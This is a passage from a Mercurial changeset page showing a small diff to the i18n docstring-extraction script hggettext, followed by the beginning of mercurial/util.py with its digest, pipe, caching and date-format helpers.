##// END OF EJS Templates
i18n: use saved object to get actual function information if available...
FUJIWARA Katsunori -
r33817:ed04d725 default
parent child Browse files
Show More
@@ -1,159 +1,161
1 1 #!/usr/bin/env python
2 2 #
3 3 # hggettext - carefully extract docstrings for Mercurial
4 4 #
5 5 # Copyright 2009 Matt Mackall <mpm@selenic.com> and others
6 6 #
7 7 # This software may be used and distributed according to the terms of the
8 8 # GNU General Public License version 2 or any later version.
9 9
10 10 # The normalize function is taken from pygettext which is distributed
11 11 # with Python under the Python License, which is GPL compatible.
12 12
13 13 """Extract docstrings from Mercurial commands.
14 14
15 15 Compared to pygettext, this script knows about the cmdtable and table
16 16 dictionaries used by Mercurial, and will only extract docstrings from
17 17 functions mentioned therein.
18 18
19 19 Use xgettext like normal to extract strings marked as translatable and
20 20 join the message cataloges to get the final catalog.
21 21 """
22 22
23 23 from __future__ import absolute_import, print_function
24 24
25 25 import inspect
26 26 import os
27 27 import re
28 28 import sys
29 29
30 30
31 31 def escape(s):
32 32 # The order is important, the backslash must be escaped first
33 33 # since the other replacements introduce new backslashes
34 34 # themselves.
35 35 s = s.replace('\\', '\\\\')
36 36 s = s.replace('\n', '\\n')
37 37 s = s.replace('\r', '\\r')
38 38 s = s.replace('\t', '\\t')
39 39 s = s.replace('"', '\\"')
40 40 return s
41 41
42 42
43 43 def normalize(s):
44 44 # This converts the various Python string types into a format that
45 45 # is appropriate for .po files, namely much closer to C style.
46 46 lines = s.split('\n')
47 47 if len(lines) == 1:
48 48 s = '"' + escape(s) + '"'
49 49 else:
50 50 if not lines[-1]:
51 51 del lines[-1]
52 52 lines[-1] = lines[-1] + '\n'
53 53 lines = map(escape, lines)
54 54 lineterm = '\\n"\n"'
55 55 s = '""\n"' + lineterm.join(lines) + '"'
56 56 return s
57 57
58 58
59 59 def poentry(path, lineno, s):
60 60 return ('#: %s:%d\n' % (path, lineno) +
61 61 'msgid %s\n' % normalize(s) +
62 62 'msgstr ""\n')
63 63
64 64 doctestre = re.compile(r'^ +>>> ', re.MULTILINE)
65 65
66 66 def offset(src, doc, name, default):
67 67 """Compute offset or issue a warning on stdout."""
68 68 # remove doctest part, in order to avoid backslash mismatching
69 69 m = doctestre.search(doc)
70 70 if m:
71 71 doc = doc[:m.start()]
72 72
73 73 # Backslashes in doc appear doubled in src.
74 74 end = src.find(doc.replace('\\', '\\\\'))
75 75 if end == -1:
76 76 # This can happen if the docstring contains unnecessary escape
77 77 # sequences such as \" in a triple-quoted string. The problem
78 78 # is that \" is turned into " and so doc wont appear in src.
79 79 sys.stderr.write("warning: unknown offset in %s, assuming %d lines\n"
80 80 % (name, default))
81 81 return default
82 82 else:
83 83 return src.count('\n', 0, end)
84 84
85 85
86 86 def importpath(path):
87 87 """Import a path like foo/bar/baz.py and return the baz module."""
88 88 if path.endswith('.py'):
89 89 path = path[:-3]
90 90 if path.endswith('/__init__'):
91 91 path = path[:-9]
92 92 path = path.replace('/', '.')
93 93 mod = __import__(path)
94 94 for comp in path.split('.')[1:]:
95 95 mod = getattr(mod, comp)
96 96 return mod
97 97
98 98
99 99 def docstrings(path):
100 100 """Extract docstrings from path.
101 101
102 102 This respects the Mercurial cmdtable/table convention and will
103 103 only extract docstrings from functions mentioned in these tables.
104 104 """
105 105 mod = importpath(path)
106 106 if mod.__doc__:
107 107 src = open(path).read()
108 108 lineno = 1 + offset(src, mod.__doc__, path, 7)
109 109 print(poentry(path, lineno, mod.__doc__))
110 110
111 111 functions = list(getattr(mod, 'i18nfunctions', []))
112 112 functions = [(f, True) for f in functions]
113 113
114 114 cmdtable = getattr(mod, 'cmdtable', {})
115 115 if not cmdtable:
116 116 # Maybe we are processing mercurial.commands?
117 117 cmdtable = getattr(mod, 'table', {})
118 118 functions.extend((c[0], False) for c in cmdtable.itervalues())
119 119
120 120 for func, rstrip in functions:
121 121 if func.__doc__:
122 docobj = func # this might be a proxy to provide formatted doc
123 func = getattr(func, '_origfunc', func)
122 124 funcmod = inspect.getmodule(func)
123 125 extra = ''
124 126 if funcmod.__package__ == funcmod.__name__:
125 127 extra = '/__init__'
126 128 actualpath = '%s%s.py' % (funcmod.__name__.replace('.', '/'), extra)
127 129
128 130 src = inspect.getsource(func)
129 131 name = "%s.%s" % (actualpath, func.__name__)
130 132 lineno = inspect.getsourcelines(func)[1]
131 doc = func.__doc__
132 origdoc = getattr(func, '_origdoc', '')
133 doc = docobj.__doc__
134 origdoc = getattr(docobj, '_origdoc', '')
133 135 if rstrip:
134 136 doc = doc.rstrip()
135 137 origdoc = origdoc.rstrip()
136 138 if origdoc:
137 139 lineno += offset(src, origdoc, name, 1)
138 140 else:
139 141 lineno += offset(src, doc, name, 1)
140 142 print(poentry(actualpath, lineno, doc))
141 143
142 144
143 145 def rawtext(path):
144 146 src = open(path).read()
145 147 print(poentry(path, 1, src))
146 148
147 149
148 150 if __name__ == "__main__":
149 151 # It is very important that we import the Mercurial modules from
150 152 # the source tree where hggettext is executed. Otherwise we might
151 153 # accidentally import and extract strings from a Mercurial
152 154 # installation mentioned in PYTHONPATH.
153 155 sys.path.insert(0, os.getcwd())
154 156 from mercurial import demandimport; demandimport.enable()
155 157 for path in sys.argv[1:]:
156 158 if path.endswith('.txt'):
157 159 rawtext(path)
158 160 else:
159 161 docstrings(path)
@@ -1,3761 +1,3763
1 1 # util.py - Mercurial utility functions and platform specific implementations
2 2 #
3 3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 6 #
7 7 # This software may be used and distributed according to the terms of the
8 8 # GNU General Public License version 2 or any later version.
9 9
10 10 """Mercurial utility functions and platform specific implementations.
11 11
12 12 This contains helper routines that are independent of the SCM core and
13 13 hide platform-specific details from the core.
14 14 """
15 15
16 16 from __future__ import absolute_import
17 17
18 18 import abc
19 19 import bz2
20 20 import calendar
21 21 import codecs
22 22 import collections
23 23 import contextlib
24 24 import datetime
25 25 import errno
26 26 import gc
27 27 import hashlib
28 28 import imp
29 29 import os
30 30 import platform as pyplatform
31 31 import re as remod
32 32 import shutil
33 33 import signal
34 34 import socket
35 35 import stat
36 36 import string
37 37 import subprocess
38 38 import sys
39 39 import tempfile
40 40 import textwrap
41 41 import time
42 42 import traceback
43 43 import warnings
44 44 import zlib
45 45
46 46 from . import (
47 47 encoding,
48 48 error,
49 49 i18n,
50 50 policy,
51 51 pycompat,
52 52 )
53 53
54 54 base85 = policy.importmod(r'base85')
55 55 osutil = policy.importmod(r'osutil')
56 56 parsers = policy.importmod(r'parsers')
57 57
58 58 b85decode = base85.b85decode
59 59 b85encode = base85.b85encode
60 60
61 61 cookielib = pycompat.cookielib
62 62 empty = pycompat.empty
63 63 httplib = pycompat.httplib
64 64 httpserver = pycompat.httpserver
65 65 pickle = pycompat.pickle
66 66 queue = pycompat.queue
67 67 socketserver = pycompat.socketserver
68 68 stderr = pycompat.stderr
69 69 stdin = pycompat.stdin
70 70 stdout = pycompat.stdout
71 71 stringio = pycompat.stringio
72 72 urlerr = pycompat.urlerr
73 73 urlreq = pycompat.urlreq
74 74 xmlrpclib = pycompat.xmlrpclib
75 75
76 76 # workaround for win32mbcs
77 77 _filenamebytestr = pycompat.bytestr
78 78
79 79 def isatty(fp):
80 80 try:
81 81 return fp.isatty()
82 82 except AttributeError:
83 83 return False
84 84
85 85 # glibc determines buffering on first write to stdout - if we replace a TTY
86 86 # destined stdout with a pipe destined stdout (e.g. pager), we want line
87 87 # buffering
88 88 if isatty(stdout):
89 89 stdout = os.fdopen(stdout.fileno(), pycompat.sysstr('wb'), 1)
90 90
91 91 if pycompat.osname == 'nt':
92 92 from . import windows as platform
93 93 stdout = platform.winstdout(stdout)
94 94 else:
95 95 from . import posix as platform
96 96
97 97 _ = i18n._
98 98
99 99 bindunixsocket = platform.bindunixsocket
100 100 cachestat = platform.cachestat
101 101 checkexec = platform.checkexec
102 102 checklink = platform.checklink
103 103 copymode = platform.copymode
104 104 executablepath = platform.executablepath
105 105 expandglobs = platform.expandglobs
106 106 explainexit = platform.explainexit
107 107 findexe = platform.findexe
108 108 gethgcmd = platform.gethgcmd
109 109 getuser = platform.getuser
110 110 getpid = os.getpid
111 111 groupmembers = platform.groupmembers
112 112 groupname = platform.groupname
113 113 hidewindow = platform.hidewindow
114 114 isexec = platform.isexec
115 115 isowner = platform.isowner
116 116 listdir = osutil.listdir
117 117 localpath = platform.localpath
118 118 lookupreg = platform.lookupreg
119 119 makedir = platform.makedir
120 120 nlinks = platform.nlinks
121 121 normpath = platform.normpath
122 122 normcase = platform.normcase
123 123 normcasespec = platform.normcasespec
124 124 normcasefallback = platform.normcasefallback
125 125 openhardlinks = platform.openhardlinks
126 126 oslink = platform.oslink
127 127 parsepatchoutput = platform.parsepatchoutput
128 128 pconvert = platform.pconvert
129 129 poll = platform.poll
130 130 popen = platform.popen
131 131 posixfile = platform.posixfile
132 132 quotecommand = platform.quotecommand
133 133 readpipe = platform.readpipe
134 134 rename = platform.rename
135 135 removedirs = platform.removedirs
136 136 samedevice = platform.samedevice
137 137 samefile = platform.samefile
138 138 samestat = platform.samestat
139 139 setbinary = platform.setbinary
140 140 setflags = platform.setflags
141 141 setsignalhandler = platform.setsignalhandler
142 142 shellquote = platform.shellquote
143 143 spawndetached = platform.spawndetached
144 144 split = platform.split
145 145 sshargs = platform.sshargs
146 146 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
147 147 statisexec = platform.statisexec
148 148 statislink = platform.statislink
149 149 testpid = platform.testpid
150 150 umask = platform.umask
151 151 unlink = platform.unlink
152 152 username = platform.username
153 153
154 154 try:
155 155 recvfds = osutil.recvfds
156 156 except AttributeError:
157 157 pass
158 158 try:
159 159 setprocname = osutil.setprocname
160 160 except AttributeError:
161 161 pass
162 162
163 163 # Python compatibility
164 164
165 165 _notset = object()
166 166
167 167 # disable Python's problematic floating point timestamps (issue4836)
168 168 # (Python hypocritically says you shouldn't change this behavior in
169 169 # libraries, and sure enough Mercurial is not a library.)
170 170 os.stat_float_times(False)
171 171
172 172 def safehasattr(thing, attr):
173 173 return getattr(thing, attr, _notset) is not _notset
174 174
175 175 def bitsfrom(container):
176 176 bits = 0
177 177 for bit in container:
178 178 bits |= bit
179 179 return bits
180 180
181 181 # python 2.6 still have deprecation warning enabled by default. We do not want
182 182 # to display anything to standard user so detect if we are running test and
183 183 # only use python deprecation warning in this case.
184 184 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
185 185 if _dowarn:
186 186 # explicitly unfilter our warning for python 2.7
187 187 #
188 188 # The option of setting PYTHONWARNINGS in the test runner was investigated.
189 189 # However, module name set through PYTHONWARNINGS was exactly matched, so
190 190 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
191 191 # makes the whole PYTHONWARNINGS thing useless for our usecase.
192 192 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
193 193 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
194 194 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
195 195
196 196 def nouideprecwarn(msg, version, stacklevel=1):
197 197 """Issue an python native deprecation warning
198 198
199 199 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
200 200 """
201 201 if _dowarn:
202 202 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
203 203 " update your code.)") % version
204 204 warnings.warn(msg, DeprecationWarning, stacklevel + 1)
205 205
206 206 DIGESTS = {
207 207 'md5': hashlib.md5,
208 208 'sha1': hashlib.sha1,
209 209 'sha512': hashlib.sha512,
210 210 }
211 211 # List of digest types from strongest to weakest
212 212 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
213 213
214 214 for k in DIGESTS_BY_STRENGTH:
215 215 assert k in DIGESTS
216 216
217 217 class digester(object):
218 218 """helper to compute digests.
219 219
220 220 This helper can be used to compute one or more digests given their name.
221 221
222 222 >>> d = digester(['md5', 'sha1'])
223 223 >>> d.update('foo')
224 224 >>> [k for k in sorted(d)]
225 225 ['md5', 'sha1']
226 226 >>> d['md5']
227 227 'acbd18db4cc2f85cedef654fccc4a4d8'
228 228 >>> d['sha1']
229 229 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
230 230 >>> digester.preferred(['md5', 'sha1'])
231 231 'sha1'
232 232 """
233 233
234 234 def __init__(self, digests, s=''):
235 235 self._hashes = {}
236 236 for k in digests:
237 237 if k not in DIGESTS:
238 238 raise Abort(_('unknown digest type: %s') % k)
239 239 self._hashes[k] = DIGESTS[k]()
240 240 if s:
241 241 self.update(s)
242 242
243 243 def update(self, data):
244 244 for h in self._hashes.values():
245 245 h.update(data)
246 246
247 247 def __getitem__(self, key):
248 248 if key not in DIGESTS:
249 249 raise Abort(_('unknown digest type: %s') % k)
250 250 return self._hashes[key].hexdigest()
251 251
252 252 def __iter__(self):
253 253 return iter(self._hashes)
254 254
255 255 @staticmethod
256 256 def preferred(supported):
257 257 """returns the strongest digest type in both supported and DIGESTS."""
258 258
259 259 for k in DIGESTS_BY_STRENGTH:
260 260 if k in supported:
261 261 return k
262 262 return None
263 263
264 264 class digestchecker(object):
265 265 """file handle wrapper that additionally checks content against a given
266 266 size and digests.
267 267
268 268 d = digestchecker(fh, size, {'md5': '...'})
269 269
270 270 When multiple digests are given, all of them are validated.
271 271 """
272 272
273 273 def __init__(self, fh, size, digests):
274 274 self._fh = fh
275 275 self._size = size
276 276 self._got = 0
277 277 self._digests = dict(digests)
278 278 self._digester = digester(self._digests.keys())
279 279
280 280 def read(self, length=-1):
281 281 content = self._fh.read(length)
282 282 self._digester.update(content)
283 283 self._got += len(content)
284 284 return content
285 285
286 286 def validate(self):
287 287 if self._size != self._got:
288 288 raise Abort(_('size mismatch: expected %d, got %d') %
289 289 (self._size, self._got))
290 290 for k, v in self._digests.items():
291 291 if v != self._digester[k]:
292 292 # i18n: first parameter is a digest name
293 293 raise Abort(_('%s mismatch: expected %s, got %s') %
294 294 (k, v, self._digester[k]))
295 295
296 296 try:
297 297 buffer = buffer
298 298 except NameError:
299 299 def buffer(sliceable, offset=0, length=None):
300 300 if length is not None:
301 301 return memoryview(sliceable)[offset:offset + length]
302 302 return memoryview(sliceable)[offset:]
303 303
304 304 closefds = pycompat.osname == 'posix'
305 305
306 306 _chunksize = 4096
307 307
308 308 class bufferedinputpipe(object):
309 309 """a manually buffered input pipe
310 310
311 311 Python will not let us use buffered IO and lazy reading with 'polling' at
312 312 the same time. We cannot probe the buffer state and select will not detect
313 313 that data are ready to read if they are already buffered.
314 314
315 315 This class let us work around that by implementing its own buffering
316 316 (allowing efficient readline) while offering a way to know if the buffer is
317 317 empty from the output (allowing collaboration of the buffer with polling).
318 318
319 319 This class lives in the 'util' module because it makes use of the 'os'
320 320 module from the python stdlib.
321 321 """
322 322
323 323 def __init__(self, input):
324 324 self._input = input
325 325 self._buffer = []
326 326 self._eof = False
327 327 self._lenbuf = 0
328 328
329 329 @property
330 330 def hasbuffer(self):
331 331 """True is any data is currently buffered
332 332
333 333 This will be used externally a pre-step for polling IO. If there is
334 334 already data then no polling should be set in place."""
335 335 return bool(self._buffer)
336 336
337 337 @property
338 338 def closed(self):
339 339 return self._input.closed
340 340
341 341 def fileno(self):
342 342 return self._input.fileno()
343 343
344 344 def close(self):
345 345 return self._input.close()
346 346
347 347 def read(self, size):
348 348 while (not self._eof) and (self._lenbuf < size):
349 349 self._fillbuffer()
350 350 return self._frombuffer(size)
351 351
352 352 def readline(self, *args, **kwargs):
353 353 if 1 < len(self._buffer):
354 354 # this should not happen because both read and readline end with a
355 355 # _frombuffer call that collapse it.
356 356 self._buffer = [''.join(self._buffer)]
357 357 self._lenbuf = len(self._buffer[0])
358 358 lfi = -1
359 359 if self._buffer:
360 360 lfi = self._buffer[-1].find('\n')
361 361 while (not self._eof) and lfi < 0:
362 362 self._fillbuffer()
363 363 if self._buffer:
364 364 lfi = self._buffer[-1].find('\n')
365 365 size = lfi + 1
366 366 if lfi < 0: # end of file
367 367 size = self._lenbuf
368 368 elif 1 < len(self._buffer):
369 369 # we need to take previous chunks into account
370 370 size += self._lenbuf - len(self._buffer[-1])
371 371 return self._frombuffer(size)
372 372
373 373 def _frombuffer(self, size):
374 374 """return at most 'size' data from the buffer
375 375
376 376 The data are removed from the buffer."""
377 377 if size == 0 or not self._buffer:
378 378 return ''
379 379 buf = self._buffer[0]
380 380 if 1 < len(self._buffer):
381 381 buf = ''.join(self._buffer)
382 382
383 383 data = buf[:size]
384 384 buf = buf[len(data):]
385 385 if buf:
386 386 self._buffer = [buf]
387 387 self._lenbuf = len(buf)
388 388 else:
389 389 self._buffer = []
390 390 self._lenbuf = 0
391 391 return data
392 392
393 393 def _fillbuffer(self):
394 394 """read data to the buffer"""
395 395 data = os.read(self._input.fileno(), _chunksize)
396 396 if not data:
397 397 self._eof = True
398 398 else:
399 399 self._lenbuf += len(data)
400 400 self._buffer.append(data)
401 401
402 402 def popen2(cmd, env=None, newlines=False):
403 403 # Setting bufsize to -1 lets the system decide the buffer size.
404 404 # The default for bufsize is 0, meaning unbuffered. This leads to
405 405 # poor performance on Mac OS X: http://bugs.python.org/issue4194
406 406 p = subprocess.Popen(cmd, shell=True, bufsize=-1,
407 407 close_fds=closefds,
408 408 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
409 409 universal_newlines=newlines,
410 410 env=env)
411 411 return p.stdin, p.stdout
412 412
413 413 def popen3(cmd, env=None, newlines=False):
414 414 stdin, stdout, stderr, p = popen4(cmd, env, newlines)
415 415 return stdin, stdout, stderr
416 416
417 417 def popen4(cmd, env=None, newlines=False, bufsize=-1):
418 418 p = subprocess.Popen(cmd, shell=True, bufsize=bufsize,
419 419 close_fds=closefds,
420 420 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
421 421 stderr=subprocess.PIPE,
422 422 universal_newlines=newlines,
423 423 env=env)
424 424 return p.stdin, p.stdout, p.stderr, p
425 425
426 426 def version():
427 427 """Return version information if available."""
428 428 try:
429 429 from . import __version__
430 430 return __version__.version
431 431 except ImportError:
432 432 return 'unknown'
433 433
434 434 def versiontuple(v=None, n=4):
435 435 """Parses a Mercurial version string into an N-tuple.
436 436
437 437 The version string to be parsed is specified with the ``v`` argument.
438 438 If it isn't defined, the current Mercurial version string will be parsed.
439 439
440 440 ``n`` can be 2, 3, or 4. Here is how some version strings map to
441 441 returned values:
442 442
443 443 >>> v = '3.6.1+190-df9b73d2d444'
444 444 >>> versiontuple(v, 2)
445 445 (3, 6)
446 446 >>> versiontuple(v, 3)
447 447 (3, 6, 1)
448 448 >>> versiontuple(v, 4)
449 449 (3, 6, 1, '190-df9b73d2d444')
450 450
451 451 >>> versiontuple('3.6.1+190-df9b73d2d444+20151118')
452 452 (3, 6, 1, '190-df9b73d2d444+20151118')
453 453
454 454 >>> v = '3.6'
455 455 >>> versiontuple(v, 2)
456 456 (3, 6)
457 457 >>> versiontuple(v, 3)
458 458 (3, 6, None)
459 459 >>> versiontuple(v, 4)
460 460 (3, 6, None, None)
461 461
462 462 >>> v = '3.9-rc'
463 463 >>> versiontuple(v, 2)
464 464 (3, 9)
465 465 >>> versiontuple(v, 3)
466 466 (3, 9, None)
467 467 >>> versiontuple(v, 4)
468 468 (3, 9, None, 'rc')
469 469
470 470 >>> v = '3.9-rc+2-02a8fea4289b'
471 471 >>> versiontuple(v, 2)
472 472 (3, 9)
473 473 >>> versiontuple(v, 3)
474 474 (3, 9, None)
475 475 >>> versiontuple(v, 4)
476 476 (3, 9, None, 'rc+2-02a8fea4289b')
477 477 """
478 478 if not v:
479 479 v = version()
480 480 parts = remod.split('[\+-]', v, 1)
481 481 if len(parts) == 1:
482 482 vparts, extra = parts[0], None
483 483 else:
484 484 vparts, extra = parts
485 485
486 486 vints = []
487 487 for i in vparts.split('.'):
488 488 try:
489 489 vints.append(int(i))
490 490 except ValueError:
491 491 break
492 492 # (3, 6) -> (3, 6, None)
493 493 while len(vints) < 3:
494 494 vints.append(None)
495 495
496 496 if n == 2:
497 497 return (vints[0], vints[1])
498 498 if n == 3:
499 499 return (vints[0], vints[1], vints[2])
500 500 if n == 4:
501 501 return (vints[0], vints[1], vints[2], extra)
502 502
503 503 # used by parsedate
504 504 defaultdateformats = (
505 505 '%Y-%m-%dT%H:%M:%S', # the 'real' ISO8601
506 506 '%Y-%m-%dT%H:%M', # without seconds
507 507 '%Y-%m-%dT%H%M%S', # another awful but legal variant without :
508 508 '%Y-%m-%dT%H%M', # without seconds
509 509 '%Y-%m-%d %H:%M:%S', # our common legal variant
510 510 '%Y-%m-%d %H:%M', # without seconds
511 511 '%Y-%m-%d %H%M%S', # without :
512 512 '%Y-%m-%d %H%M', # without seconds
513 513 '%Y-%m-%d %I:%M:%S%p',
514 514 '%Y-%m-%d %H:%M',
515 515 '%Y-%m-%d %I:%M%p',
516 516 '%Y-%m-%d',
517 517 '%m-%d',
518 518 '%m/%d',
519 519 '%m/%d/%y',
520 520 '%m/%d/%Y',
521 521 '%a %b %d %H:%M:%S %Y',
522 522 '%a %b %d %I:%M:%S%p %Y',
523 523 '%a, %d %b %Y %H:%M:%S', # GNU coreutils "/bin/date --rfc-2822"
524 524 '%b %d %H:%M:%S %Y',
525 525 '%b %d %I:%M:%S%p %Y',
526 526 '%b %d %H:%M:%S',
527 527 '%b %d %I:%M:%S%p',
528 528 '%b %d %H:%M',
529 529 '%b %d %I:%M%p',
530 530 '%b %d %Y',
531 531 '%b %d',
532 532 '%H:%M:%S',
533 533 '%I:%M:%S%p',
534 534 '%H:%M',
535 535 '%I:%M%p',
536 536 )
537 537
538 538 extendeddateformats = defaultdateformats + (
539 539 "%Y",
540 540 "%Y-%m",
541 541 "%b",
542 542 "%b %Y",
543 543 )
544 544
545 545 def cachefunc(func):
546 546 '''cache the result of function calls'''
547 547 # XXX doesn't handle keywords args
548 548 if func.__code__.co_argcount == 0:
549 549 cache = []
550 550 def f():
551 551 if len(cache) == 0:
552 552 cache.append(func())
553 553 return cache[0]
554 554 return f
555 555 cache = {}
556 556 if func.__code__.co_argcount == 1:
557 557 # we gain a small amount of time because
558 558 # we don't need to pack/unpack the list
559 559 def f(arg):
560 560 if arg not in cache:
561 561 cache[arg] = func(arg)
562 562 return cache[arg]
563 563 else:
564 564 def f(*args):
565 565 if args not in cache:
566 566 cache[args] = func(*args)
567 567 return cache[args]
568 568
569 569 return f
570 570
571 571 class sortdict(collections.OrderedDict):
572 572 '''a simple sorted dictionary
573 573
574 574 >>> d1 = sortdict([('a', 0), ('b', 1)])
575 575 >>> d2 = d1.copy()
576 576 >>> d2
577 577 sortdict([('a', 0), ('b', 1)])
578 578 >>> d2.update([('a', 2)])
579 579 >>> d2.keys() # should still be in last-set order
580 580 ['b', 'a']
581 581 '''
582 582
583 583 def __setitem__(self, key, value):
584 584 if key in self:
585 585 del self[key]
586 586 super(sortdict, self).__setitem__(key, value)
587 587
588 588 if pycompat.ispypy:
589 589 # __setitem__() isn't called as of PyPy 5.8.0
590 590 def update(self, src):
591 591 if isinstance(src, dict):
592 592 src = src.iteritems()
593 593 for k, v in src:
594 594 self[k] = v
595 595
596 596 class transactional(object):
597 597 """Base class for making a transactional type into a context manager."""
598 598 __metaclass__ = abc.ABCMeta
599 599
600 600 @abc.abstractmethod
601 601 def close(self):
602 602 """Successfully closes the transaction."""
603 603
604 604 @abc.abstractmethod
605 605 def release(self):
606 606 """Marks the end of the transaction.
607 607
608 608 If the transaction has not been closed, it will be aborted.
609 609 """
610 610
611 611 def __enter__(self):
612 612 return self
613 613
614 614 def __exit__(self, exc_type, exc_val, exc_tb):
615 615 try:
616 616 if exc_type is None:
617 617 self.close()
618 618 finally:
619 619 self.release()
620 620
621 621 @contextlib.contextmanager
622 622 def acceptintervention(tr=None):
623 623 """A context manager that closes the transaction on InterventionRequired
624 624
625 625 If no transaction was provided, this simply runs the body and returns
626 626 """
627 627 if not tr:
628 628 yield
629 629 return
630 630 try:
631 631 yield
632 632 tr.close()
633 633 except error.InterventionRequired:
634 634 tr.close()
635 635 raise
636 636 finally:
637 637 tr.release()
638 638
639 639 @contextlib.contextmanager
640 640 def nullcontextmanager():
641 641 yield
642 642
643 643 class _lrucachenode(object):
644 644 """A node in a doubly linked list.
645 645
646 646 Holds a reference to nodes on either side as well as a key-value
647 647 pair for the dictionary entry.
648 648 """
649 649 __slots__ = (u'next', u'prev', u'key', u'value')
650 650
651 651 def __init__(self):
652 652 self.next = None
653 653 self.prev = None
654 654
655 655 self.key = _notset
656 656 self.value = None
657 657
658 658 def markempty(self):
659 659 """Mark the node as emptied."""
660 660 self.key = _notset
661 661
662 662 class lrucachedict(object):
663 663 """Dict that caches most recent accesses and sets.
664 664
665 665 The dict consists of an actual backing dict - indexed by original
666 666 key - and a doubly linked circular list defining the order of entries in
667 667 the cache.
668 668
669 669 The head node is the newest entry in the cache. If the cache is full,
670 670 we recycle head.prev and make it the new head. Cache accesses result in
671 671 the node being moved to before the existing head and being marked as the
672 672 new head node.
673 673 """
674 674 def __init__(self, max):
675 675 self._cache = {}
676 676
677 677 self._head = head = _lrucachenode()
678 678 head.prev = head
679 679 head.next = head
680 680 self._size = 1
681 681 self._capacity = max
682 682
683 683 def __len__(self):
684 684 return len(self._cache)
685 685
686 686 def __contains__(self, k):
687 687 return k in self._cache
688 688
689 689 def __iter__(self):
690 690 # We don't have to iterate in cache order, but why not.
691 691 n = self._head
692 692 for i in range(len(self._cache)):
693 693 yield n.key
694 694 n = n.next
695 695
696 696 def __getitem__(self, k):
697 697 node = self._cache[k]
698 698 self._movetohead(node)
699 699 return node.value
700 700
701 701 def __setitem__(self, k, v):
702 702 node = self._cache.get(k)
703 703 # Replace existing value and mark as newest.
704 704 if node is not None:
705 705 node.value = v
706 706 self._movetohead(node)
707 707 return
708 708
709 709 if self._size < self._capacity:
710 710 node = self._addcapacity()
711 711 else:
712 712 # Grab the last/oldest item.
713 713 node = self._head.prev
714 714
715 715 # At capacity. Kill the old entry.
716 716 if node.key is not _notset:
717 717 del self._cache[node.key]
718 718
719 719 node.key = k
720 720 node.value = v
721 721 self._cache[k] = node
722 722 # And mark it as newest entry. No need to adjust order since it
723 723 # is already self._head.prev.
724 724 self._head = node
725 725
726 726 def __delitem__(self, k):
727 727 node = self._cache.pop(k)
728 728 node.markempty()
729 729
730 730 # Temporarily mark as newest item before re-adjusting head to make
731 731 # this node the oldest item.
732 732 self._movetohead(node)
733 733 self._head = node.next
734 734
735 735 # Additional dict methods.
736 736
737 737 def get(self, k, default=None):
738 738 try:
739 739 return self._cache[k].value
740 740 except KeyError:
741 741 return default
742 742
743 743 def clear(self):
744 744 n = self._head
745 745 while n.key is not _notset:
746 746 n.markempty()
747 747 n = n.next
748 748
749 749 self._cache.clear()
750 750
751 751 def copy(self):
752 752 result = lrucachedict(self._capacity)
753 753 n = self._head.prev
754 754 # Iterate in oldest-to-newest order, so the copy has the right ordering
755 755 for i in range(len(self._cache)):
756 756 result[n.key] = n.value
757 757 n = n.prev
758 758 return result
759 759
760 760 def _movetohead(self, node):
761 761 """Mark a node as the newest, making it the new head.
762 762
763 763 When a node is accessed, it becomes the freshest entry in the LRU
764 764 list, which is denoted by self._head.
765 765
766 766 Visually, let's make ``N`` the new head node (* denotes head):
767 767
768 768 previous/oldest <-> head <-> next/next newest
769 769
770 770 ----<->--- A* ---<->-----
771 771 | |
772 772 E <-> D <-> N <-> C <-> B
773 773
774 774 To:
775 775
776 776 ----<->--- N* ---<->-----
777 777 | |
778 778 E <-> D <-> C <-> B <-> A
779 779
780 780 This requires the following moves:
781 781
782 782 C.next = D (node.prev.next = node.next)
783 783 D.prev = C (node.next.prev = node.prev)
784 784 E.next = N (head.prev.next = node)
785 785 N.prev = E (node.prev = head.prev)
786 786 N.next = A (node.next = head)
787 787 A.prev = N (head.prev = node)
788 788 """
789 789 head = self._head
790 790 # C.next = D
791 791 node.prev.next = node.next
792 792 # D.prev = C
793 793 node.next.prev = node.prev
794 794 # N.prev = E
795 795 node.prev = head.prev
796 796 # N.next = A
797 797 # It is tempting to do just "head" here, however if node is
798 798 # adjacent to head, this will do bad things.
799 799 node.next = head.prev.next
800 800 # E.next = N
801 801 node.next.prev = node
802 802 # A.prev = N
803 803 node.prev.next = node
804 804
805 805 self._head = node
806 806
807 807 def _addcapacity(self):
808 808 """Add a node to the circular linked list.
809 809
810 810 The new node is inserted before the head node.
811 811 """
812 812 head = self._head
813 813 node = _lrucachenode()
814 814 head.prev.next = node
815 815 node.prev = head.prev
816 816 node.next = head
817 817 head.prev = node
818 818 self._size += 1
819 819 return node
820 820
821 821 def lrucachefunc(func):
822 822 '''cache most recent results of function calls'''
823 823 cache = {}
824 824 order = collections.deque()
825 825 if func.__code__.co_argcount == 1:
826 826 def f(arg):
827 827 if arg not in cache:
828 828 if len(cache) > 20:
829 829 del cache[order.popleft()]
830 830 cache[arg] = func(arg)
831 831 else:
832 832 order.remove(arg)
833 833 order.append(arg)
834 834 return cache[arg]
835 835 else:
836 836 def f(*args):
837 837 if args not in cache:
838 838 if len(cache) > 20:
839 839 del cache[order.popleft()]
840 840 cache[args] = func(*args)
841 841 else:
842 842 order.remove(args)
843 843 order.append(args)
844 844 return cache[args]
845 845
846 846 return f
847 847
848 848 class propertycache(object):
849 849 def __init__(self, func):
850 850 self.func = func
851 851 self.name = func.__name__
852 852 def __get__(self, obj, type=None):
853 853 result = self.func(obj)
854 854 self.cachevalue(obj, result)
855 855 return result
856 856
857 857 def cachevalue(self, obj, value):
858 858 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
859 859 obj.__dict__[self.name] = value
860 860
861 861 def pipefilter(s, cmd):
